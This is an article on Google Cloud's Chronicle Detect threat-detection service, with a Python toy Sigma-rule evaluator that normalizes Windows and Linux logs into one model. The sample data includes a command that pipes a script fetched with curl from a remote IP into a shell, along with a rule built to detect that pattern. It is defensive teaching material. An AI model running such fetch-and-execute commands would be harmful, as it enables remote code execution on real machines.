Chronicle Detect, a new threat-detection solution built on the infrastructure of Google Cloud, is slated to become generally available in the fourth quarter of 2020. The tool is meant to help organizations move from legacy security tools to a modern system that can identify threats at scale and in near real time.
Available at no additional cost to Chronicle customers, Chronicle Detect was announced at a time when enterprise IT environments face increasingly sophisticated attacker tradecraft and growing data volumes that existing analytics and detection tools struggle to handle.
“In legacy security systems, it’s difficult to run many rules in parallel and at scale, so even if detection is possible, it may be too late,” Rick Caccia, Google Cloud’s head of marketing for cloud security, and Sunil Potti, general manager and vice president of engineering for cloud security, wrote in a blog post. “Most analytics tools use a data-query language, making it difficult to write detection rules described in scenarios such as the MITRE ATT&CK framework. Detections often require threat intelligence on attacker activity that many vendors simply don’t have. As a result, security tools are unable to detect many modern threats.”
Previously, Chronicle was a separate cybersecurity startup in the portfolio of Alphabet, the parent company of Google. With Chronicle Detect, users can migrate the detection rules they already run in their legacy tools or build new rules of their own.
“The rules engine incorporates one of the most flexible and widely-used detection languages in the world, YARA, which makes it easy to build detections for tactics and techniques found in the commonly used MITRE ATT&CK security framework,” Caccia and Potti said. “Many organizations are also integrating Sigma-based rules that work across systems or converting their legacy rules to Sigma for portability. Chronicle Detect includes a Sigma-YARA converter so that customers can port their rules to and from our platform.”
“Using our Google-scale platform, security teams can send their security telemetry to Chronicle at a fixed cost, so that diverse, high-value security data can be taken into account for detections,” Caccia and Potti wrote. “We automatically make that security data useful by mapping it to a common data model across machines, users and threat indicators, so that you can quickly apply powerful detection rules to a unified set of data.”
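The two quoted passages describe a pipeline: normalize telemetry from different sources into one common data model, then run portable Sigma-style rules (tagged with ATT&CK techniques) across that unified data. The following Python is an added example written for this page to make that pipeline concrete; it is not Chronicle's rules engine and does not show Chronicle's own rule language or its Sigma-YARA converter. The common-model field names (`process_path`, `command_line`, `user`, `hostname`), the raw log records and the rule are all constructed for illustration. Only a subset of Sigma is implemented: the `contains`, `startswith`, `endswith` and `all` modifiers, Sigma's case-insensitive string matching, and `and`/`or`/`not` conditions over named selections.

```python
"""Toy evaluator for a subset of Sigma detection rules over normalized events.

Added example for this page, not Chronicle code. Common-model field names,
raw log shapes and the rule itself are constructed for illustration.
"""
import re

# --- Step 1: map heterogeneous telemetry onto one common data model ---------
# Constructed raw records: a Windows process-creation event and two Linux
# auditd-style records, each using its own vendor field names.
RAW_EVENTS = [
    {"source": "windows", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "SubjectUserName": "alice", "Computer": "WS01"},
    {"source": "linux", "proc": "/usr/bin/bash", "args": "bash -c 'curl http://203.0.113.5/x.sh | sh'",
     "user": "root", "host": "srv01"},
    {"source": "linux", "proc": "/usr/bin/bash", "args": "bash -c 'curl https://repo.internal/build.sh | sh'",
     "user": "builduser", "host": "ci01"},
]

# Per-source mapping of raw field -> common-model field (names are assumptions).
FIELD_MAPS = {
    "windows": {"NewProcessName": "process_path", "CommandLine": "command_line",
                "SubjectUserName": "user", "Computer": "hostname"},
    "linux": {"proc": "process_path", "args": "command_line", "user": "user", "host": "hostname"},
}

def normalize(raw):
    """Rewrite one raw record with common-model field names; unmapped fields are dropped."""
    mapping = FIELD_MAPS[raw["source"]]
    event = {"source": raw["source"]}
    for key, value in raw.items():
        if key in mapping:
            event[mapping[key]] = value
    return event

# --- Step 2: a portable Sigma-style rule written against the common model ---
# Constructed rule in Sigma's dict layout; the tag uses Sigma's ATT&CK convention
# (T1059.004 is Command and Scripting Interpreter: Unix Shell).
RULE = {
    "title": "curl piped to shell",
    "tags": ["attack.execution", "attack.t1059.004"],
    "detection": {
        "selection": {"command_line|contains|all": ["curl ", "| sh"]},
        "filter_ci": {"user": "builduser", "command_line|contains": "repo.internal"},
        "condition": "selection and not filter_ci",
    },
}

def _match_value(actual, pattern, mods):
    """Compare one field value against one pattern under Sigma modifiers (case-insensitive)."""
    a, p = str(actual).lower(), str(pattern).lower()
    if "contains" in mods:
        return p in a
    if "startswith" in mods:
        return a.startswith(p)
    if "endswith" in mods:
        return a.endswith(p)
    return a == p

def match_selection(selection, event):
    """Sigma semantics: keys in a selection are ANDed; list values are ORed unless |all."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        if field not in event:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        hits = [_match_value(event[field], p, mods) for p in patterns]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def eval_condition(cond, results):
    """Recursive-descent evaluator for conditions like 'a and not (b or c)'."""
    tokens = re.findall(r"\(|\)|\w+", cond)
    pos = 0

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def expr():  # expr := term ('or' term)*
        value = term()
        while peek() == "or":
            take()
            rhs = term()
            value = value or rhs
        return value

    def term():  # term := factor ('and' factor)*
        value = factor()
        while peek() == "and":
            take()
            rhs = factor()
            value = value and rhs
        return value

    def factor():  # factor := 'not' factor | '(' expr ')' | selection-name
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            value = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        if tok not in results:
            raise KeyError(f"condition references unknown selection {tok!r}")
        return results[tok]

    value = expr()
    if peek() is not None:
        raise ValueError(f"trailing tokens in condition: {cond!r}")
    return value

def run_rule(rule, events):
    """Return the events the rule fires on, annotated with its title and ATT&CK tags."""
    det = rule["detection"]
    selections = {name: sel for name, sel in det.items() if name != "condition"}
    hits = []
    for event in events:
        results = {name: match_selection(sel, event) for name, sel in selections.items()}
        if eval_condition(det["condition"], results):
            hits.append({**event, "rule": rule["title"], "tags": rule["tags"]})
    return hits

def detect(raw_events=RAW_EVENTS, rule=RULE):
    """Normalize, then detect: the same rule runs over Windows and Linux telemetry alike."""
    return run_rule(rule, [normalize(r) for r in raw_events])

if __name__ == "__main__":
    for hit in detect():
        print(f"[{hit['rule']}] host={hit['hostname']} user={hit['user']} cmd={hit['command_line']}")
```

The point of the example is the order of operations: because the rule is written against common-model fields rather than `CommandLine` or `args`, a single rule covers both sources, and porting it to another platform means translating the rule's field names and modifiers, not rewriting its logic. The `filter_ci` selection shows the usual way false positives from a known-good CI host are suppressed without weakening the main selection.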